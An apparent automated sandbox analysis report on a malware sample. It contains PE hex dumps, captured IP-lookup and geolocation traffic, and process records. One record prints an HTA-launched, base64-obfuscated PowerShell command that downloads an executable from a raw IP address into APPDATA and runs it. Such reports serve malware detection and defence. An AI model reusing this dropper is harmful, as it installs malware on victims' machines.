                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fe 81 d1 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 e2 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELg"}@0@@@L|p;q+pH@.text `.rdata@@.datatR@.rsrc;p<@@.relocqrR@B
                                                                                          Mar 13, 2025 01:18:59.937987089 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: DALhYC,YY9hcCY8hiCYhnCYM,hsCYhxCYQ
                                                                                          Mar 13, 2025 01:18:59.938059092 CET1236INData Raw: 00 68 7d b5 43 00 e8 ca 1c 02 00 59 c3 a1 10 53 4c 00 51 8b 40 04 05 10 53 4c 00 50 e8 ff 5f 00 00 68 92 b5 43 00 e8 aa 1c 02 00 59 c3 e8 05 31 00 00 68 97 b5 43 00 e8 99 1c 02 00 59 c3 e8 e6 73 00 00 68 9c b5 43 00 e8 88 1c 02 00 59 c3 e8 67 4c
                                                                                          Data Ascii: h}CYSLQ@SLP_hCY1hCYshCYgLhCwYdLehCaYSVWj[lGKyNlGN(GVY_^[SV3Wj_NN(^^~^^^ ^$ef^8
                                                                                          Mar 13, 2025 01:18:59.938143969 CET224INData Raw: db 43 c7 45 fc fe ff ff ff 57 89 5d f0 ff 15 28 f1 48 00 8b 75 0c 88 1d 6c 58 4c 00 eb 6f ff 75 f0 33 db 53 ff 75 fc ff 75 f8 57 e8 84 fd ff ff 39 5e 0c 7e 34 8b ce 8d 86 10 08 00 00 8d 56 10 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2
                                                                                          Data Ascii: CEW](HulXLou3SuuW9^~4VEUM8sS@EU;FE|F;t+PPCPW$HvuuW_^[];t +QPCPW$HEUMt
                                                                                          Mar 13, 2025 01:18:59.938155890 CET1236INData Raw: 44 80 f9 08 75 4c 8b 4d f8 83 f9 ff 74 0c ff 75 fc 57 e8 7a fd ff ff 8b 4d f8 8b 45 0c 83 38 ff 74 05 8b 08 89 4d f8 8b 40 04 83 f8 ff 74 1e 89 45 fc ff 75 f0 6a 00 50 51 57 e8 95 fc ff ff 8b 45 f4 8b 55 0c 8b 4d 08 e9 23 ff ff ff 8b 45 fc eb e0
                                                                                          Data Ascii: DuLMtuWzME8tM@tEujPQWEUM#EuMUuWLXLqPjujuH]UuWLMPPjjjuH]UQSVuWL!uWLVEM
                                                                                          Mar 13, 2025 01:18:59.938179970 CET1236INData Raw: 8b c3 c1 e8 10 50 57 0f b7 c3 50 56 e8 97 fd ff ff e9 04 ff ff ff 49 74 0d 49 49 0f 85 e2 fe ff ff e9 03 9e 03 00 51 51 56 e8 77 ae 08 00 e9 e7 fe ff ff 6a 02 e9 7e fe ff ff 6a 01 e9 77 fe ff ff 51 e9 e3 9e 03 00 6a 01 e9 ab 9e 03 00 55 8b ec 56
                                                                                          Data Ascii: PWPVItIIQQVwj~jwQjUVW}Mt<ESt;u>^;u>VEYt[jj7XH_^]uMt9t6UM$uE(@
                                                                                          Mar 13, 2025 01:18:59.938194036 CET448INData Raw: 00 00 00 eb b6 66 8b 45 e0 66 89 87 8a 00 00 00 eb ae 55 8b ec a1 b4 57 4c 00 8b 4d 18 83 f8 01 0f 85 71 9c 03 00 8b 45 08 83 f8 ff 74 03 89 41 58 8b 45 0c 83 f8 ff 74 03 89 41 5c 8b 45 10 85 c0 7e 03 89 41 60 8b 45 14 85 c0 7e 03 89 41 64 5d c2
                                                                                          Data Ascii: fEfUWLMqEtAXEtA\E~A`E~Ad]UQXLVuWj8Wc4XLjZU;$XL0F;G{r:VW~dk~hs~
                                                                                          Mar 13, 2025 01:18:59.938280106 CET1236INData Raw: 58 4c 00 8b 44 88 fc 83 38 00 75 0c b9 0c 58 4c 00 e8 95 13 00 00 eb dc 8b e5 5d c2 04 00 55 8b ec 83 ec 14 8b 4d 08 a1 10 58 4c 00 53 56 57 8b 04 88 b9 b0 57 4c 00 ff 75 10 8b 18 89 5d fc e8 10 04 00 00 6a 0f 8b f0 c6 45 0b 00 ff 15 28 f5 48 00
                                                                                          Data Ascii: XLD8uXL]UMXLSVWWLu]jE(H{Lt{L$XLKHyiwq"@$"@E{LuUj(HPu H}ju8HjH_^[]tj
                                                                                          Mar 13, 2025 01:18:59.938296080 CET1236INData Raw: 33 c0 89 1d b8 57 4c 00 40 88 1d bc 57 4c 00 57 83 cf ff a2 b0 57 4c 00 b9 f0 57 4c 00 a3 b4 57 4c 00 89 1d c0 57 4c 00 a3 c8 57 4c 00 89 1d d0 57 4c 00 89 1d d4 57 4c 00 89 3d d8 57 4c 00 89 1d dc 57 4c 00 89 1d e0 57 4c 00 89 1d e4 57 4c 00 88
                                                                                          Data Ascii: 3WL@WLWWLWLWLWLWLWLWL=WLWLWLWLWLOj^j|XfWL3XLHXLXLXL=XL XLH$XL(XL,XL50XL4XL8XL<XL@XL=DXL=HXL|XLXLXL=XLfWL
                                                                                          Mar 13, 2025 01:18:59.938311100 CET448INData Raw: 85 65 97 03 00 8b 0d 1c 58 4c 00 83 f9 ff 74 2f 8b 55 08 8d 42 0d 83 f8 0d 77 24 a1 10 58 4c 00 ff 75 0c c1 e2 04 8b 04 88 8d 8a 5c 01 00 00 8b 00 03 c8 e8 e0 54 00 00 33 c0 40 5d c2 0c 00 33 c0 eb f8 55 8b ec 51 51 83 7d 18 00 0f 85 32 97 03 00
                                                                                          Data Ascii: eXLt/UBw$XLu\T3@]3UQQ}2XLtt}7XLVW}0E3@E5}tMg~L}6EjPFLEu*E u'~8_^]3vLxFPFTU\
                                                                                          Mar 13, 2025 01:18:59.943274975 CET1236INData Raw: c2 ff 77 64 ff 15 c8 f0 48 00 eb bd ff 77 68 ff 15 3c f7 48 00 eb b8 ff 77 50 ff 15 3c f6 48 00 eb b3 8b 4c 24 10 89 4e 1c eb b3 55 8b ec 8b 45 08 83 ec 28 53 56 8b 35 1c 58 4c 00 57 83 f8 0c 0f 84 2c 9c 03 00 83 f8 0d 7e 1b 83 f8 0f 0f 8e 1e 9c
                                                                                          Data Ascii: wdHwh<HwP<HL$NUE(SV5XLW,~XLS]}f$XLU0uPfWLfUEM}UU(EM}U


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.949684132.226.247.73806960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Mar 13, 2025 01:19:06.212821007 CET151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Mar 13, 2025 01:19:07.070332050 CET273INHTTP/1.1 200 OK
                                                                                          Date: Thu, 13 Mar 2025 00:19:06 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                          Mar 13, 2025 01:19:07.105840921 CET273INHTTP/1.1 200 OK
                                                                                          Date: Thu, 13 Mar 2025 00:19:06 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                          Mar 13, 2025 01:19:07.323632002 CET127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Mar 13, 2025 01:19:07.532721043 CET273INHTTP/1.1 200 OK
                                                                                          Date: Thu, 13 Mar 2025 00:19:07 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.949685104.21.64.14436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-03-13 00:19:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2025-03-13 00:19:09 UTC852INHTTP/1.1 200 OK
                                                                                          Date: Thu, 13 Mar 2025 00:19:09 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 235062
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Mon, 10 Mar 2025 07:01:26 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IN80rGMPqVVVFJ4wDTiXuA5QyElkP4EwKks2Pm9edF8eyg6fW2egybTZGpoKJqYNcPHopnKtwtkwby0P9dollkAVaU5Dqs9P%2FjLQu1x5x9Q3fa6mQQkyQy9pS73glLVlv48JdRq1"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 91f75bb1e89f9c5e-IAD
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=17648&min_rtt=16801&rtt_var=6194&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=141814&cwnd=243&unsent_bytes=0&cid=d332f384e1eb952e&ts=593&x=0"
                                                                                          2025-03-13 00:19:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:20:18:54
                                                                                          Start date:12/03/2025
                                                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:mshta.exe "C:\Users\user\Desktop\wecreatebestthingsentirelifeforgivenyou.hta"
                                                                                          Imagebase:0x700000
                                                                                          File size:13'312 bytes
                                                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:20:18:54
                                                                                          Start date:12/03/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"
                                                                                          Imagebase:0xd50000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash: